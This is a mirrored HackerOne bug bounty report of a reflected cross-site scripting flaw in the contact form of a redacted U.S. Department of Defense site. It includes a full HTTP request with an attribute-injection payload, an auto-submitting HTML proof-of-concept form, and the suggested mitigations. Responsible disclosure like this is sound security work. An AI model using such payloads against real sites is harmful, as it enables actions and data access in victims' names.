Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneTmz900H1:1626962
HistoryJul 05, 2022 - 6:30 p.m.

U.S. Dept Of Defense: RXSS on ███████

2022-07-0518:30:08
tmz900
hackerone.com
10
JSON

I found Reflected XSS on https://███/contact-us/#.YsSAGCNBzaQ.
The parameters in the contact form are not properly filtered, leading to possible insertion of " characters and javascript execution

Impact

Perform any action within the application that the user can perform.
View any information that the user is able to view.
Modify any information that the user is able to modify.
Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.

System Host(s)

███████

Affected Product(s) and Version(s)

CVE Numbers

Steps to Reproduce

  1. Use this code in your BurpSuite Repeater.
POST /contact-us/ HTTP/1.1
Host: ███████
Cookie: wire=kh92hb67grih1376an7igoeo39; _ga_877MBKEB9K=GS1.1.1657044258.1.1.1657044351.0; _ga=GA1.2.58467857.1657044259; __atuvc=2%7C27; __atuvs=62c47d237cd3f8d9001; __atrfs=ab/|pos/|tot/|rsi/62c47d0400000000|cfc/|hash/0|rsiq/|fuid/d2cfdda4|rxi/|rsc/addressbar|gen/1|csi/|dr/; _gid=GA1.2.2089900381.1657044260; wires=cqr7lhfhfudpdntime6mevkslt; _gat_gtag_UA_377760_26=1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Origin: https://██████
Referer: https://████████/contact-us/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

name="%20onfocus=alert('tmz900')%20autofocus//"&email=test%40gmail.com&phone=1234567895&message=test&submitted=submitted&g-recaptcha-response=
  1. You will see an alert box pop up:

█████████

  1. Or you can use this code test on html file:
<html>
  
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://████/contact-us/" method="POST">
      <input type="hidden" name="name" value="" onfocus=alert('tmz900') autofocus//"" />
      <input type="hidden" name="email" value="test@gmail.com" />
      <input type="hidden" name="phone" value="1234567895" />
      <input type="hidden" name="message" value="test" />
      <input type="hidden" name="submitted" value="submitted" />
      <input type="hidden" name="g-recaptcha-response" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Suggested Mitigation/Remediation Actions

Filter input on arrival
Encode data on output
Use appropriate response headers
Content Security Policy.

JSON